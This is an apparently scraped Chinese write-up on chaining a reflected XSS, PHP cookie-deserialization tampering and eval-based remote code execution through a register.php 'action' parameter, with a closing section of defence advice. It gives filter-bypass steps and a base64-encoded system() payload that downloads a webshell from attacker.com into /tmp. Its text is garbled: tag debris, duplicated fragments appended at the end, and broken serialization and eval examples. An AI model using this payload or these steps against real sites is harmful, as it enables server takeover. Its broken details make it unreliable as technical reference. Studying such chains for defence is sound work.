PHP反序列化到RCE漏洞分析与利用<\/h1>

漏洞概述<\/h2>
本文详细分析了一个从反射型XSS发现开始，逐步深入挖掘出PHP反序列化漏洞和远程代码执行(RCE)漏洞的过程。该漏洞链展示了如何通过系统性的测试方法，从一个看似无害的XSS漏洞入手，最终获取服务器完全控制权限。<\/p>

漏洞发现过程<\/h2>

1. 初始发现：反射型XSS<\/h3>
首先在目标网站发现了一个反射型XSS漏洞，位于`comefrom<\/code>参数中。这类参数通常是XSS的高发点。<\/p>`

2. PHP反序列化漏洞分析<\/h3>
2.1 Cookie结构分析<\/h4>
注册账号后发现__user<\/code> Cookie值经过URL解码后显示为PHP序列化格式：<\/p>
O:14:"User":4:{s:8:"Nickname";s:5:"test1";s:2:"Id";s:5:"19632";s:4:"Hash";s:32:"e10adc3949ba59abbe56e057f20f883e";s:8:"Username";s:5:"test1";}
<\/code><\/pre>
PHP序列化格式解析：<\/p>

O:strlen(object name):object name:object size:{s:strlen(property name):property name:property definition;}<\/code><\/li>
<\/ul>
2.2 反序列化尝试<\/h4>
尝试修改序列化数据中的ID字段：<\/p>

原始：O:14:s:8:"11111111"<\/code><\/li>
修改后：O:10:s:8:"4444"<\/code><\/li>
<\/ol>
发现修改后无法获取值，表明系统有校验机制。<\/p>
2.3 校验机制分析<\/h4>
发现两个可能的校验点：<\/p>

__uniqueId<\/code>：32位值，疑似MD5<\/li>
Hash<\/code>字段：也是32位，名称更可疑<\/li>
<\/ol>
最终确认系统校验的是Hash<\/code>字段（通过查看源码确认）。<\/p>
3. 远程代码执行(RCE)漏洞<\/h3>
3.1 发现危险功能<\/h4>
在注册请求中发现action<\/code>参数，测试发现可直接执行PHP代码：<\/p>
POST \/register.php
action=phpinfo
<\/code><\/pre>
响应中返回了phpinfo()<\/code>的执行结果，确认存在代码执行漏洞。<\/p>
3.2 代码执行分析<\/h4>
推测后端代码实现类似：<\/p>
eval<\/span>($_POST['action'<\/span>]+<\/span>"()"<\/span>);
<\/span><\/span><\/code><\/pre>初始限制：<\/p>

只能执行无参函数（因为自动添加了括号）<\/li>
存在字符过滤：'"\\/+-*,<\/code>和空格都被过滤<\/li>
<\/ol>
3.3 绕过限制技术<\/h4>


使用无参函数探测环境：<\/p>

get_included_files()<\/code><\/li>
get_defined_functions()<\/code><\/li>
<\/ul>
<\/li>

发现可以执行带参函数（通过var_dump<\/code>确认）<\/p>
<\/li>

空格绕过尝试：<\/p>

常见CTF空格绕过字符（${IFS}<\/code>, <<\/code>, ><\/code>, %09<\/code>）大多被过滤<\/li>
%09<\/code>被拦截（%2509<\/code>也被拦截）<\/li>
<\/ul>
<\/li>

最终利用方案：<\/p>

通过get_defined_functions()<\/code>查看可用函数<\/li>
使用system(base64_decode("命令base64"))<\/code>绕过空格限制<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用步骤<\/h2>
反序列化利用<\/h3>

获取合法用户的Cookie<\/li>
分析__user<\/code>结构<\/li>
修改关键字段（如ID）<\/li>
确保Hash<\/code>校验通过（或暴力破解）<\/li>
<\/ol>
RCE利用<\/h3>


发现action<\/code>参数<\/p>
<\/li>

测试直接代码执行：<\/p>
POST \/register.php
action=phpinfo
<\/code><\/pre>
<\/li>

执行系统命令：<\/p>
POST \/register.php
action=system(base64_decode("Y2QgL3RtcCAmJiB3Z2V0IGh0dHA6Ly9hdHRhY2tlci5jb20vc2hlbGwucGhwIC1PIC90bXAvc2hlbGwucGhw"))
<\/code><\/pre>
<\/li>
<\/ol>
防御建议<\/h2>


反序列化防御<\/strong>：<\/p>

避免反序列化用户可控数据<\/li>
使用签名验证序列化数据完整性<\/li>
实现严格的类型检查<\/li>
<\/ul>
<\/li>

RCE防御<\/strong>：<\/p>

禁止使用eval()<\/code>执行用户输入<\/li>
实现严格的输入过滤<\/li>
使用白名单限制可执行函数<\/li>
<\/ul>
<\/li>

系统加固<\/strong>：<\/p>

禁用危险函数（system<\/code>, exec<\/code>, passthru<\/code>等）<\/li>
实施最小权限原则<\/li>
定期安全审计<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
这个漏洞链展示了从低危漏洞到高危漏洞的完整挖掘过程，强调了系统性测试的重要性。开发人员应避免直接执行用户输入，并谨慎处理序列化数据。安全研究人员则应关注所有用户可控输入点，不放过任何可疑行为。<\/p>

PHP反序列化到RCE漏洞分析与利用<\/h1>

漏洞发现过程<\/h2>

1. 初始发现：反射型XSS<\/h3> 首先在目标网站发现了一个反射型XSS漏洞，位于comefrom<\/code>参数中。这类参数通常是XSS的高发点。<\/p>

漏洞利用步骤<\/h2>

1. 初始发现：反射型XSS<\/h3>
首先在目标网站发现了一个反射型XSS漏洞，位于`comefrom<\/code>参数中。这类参数通常是XSS的高发点。<\/p>`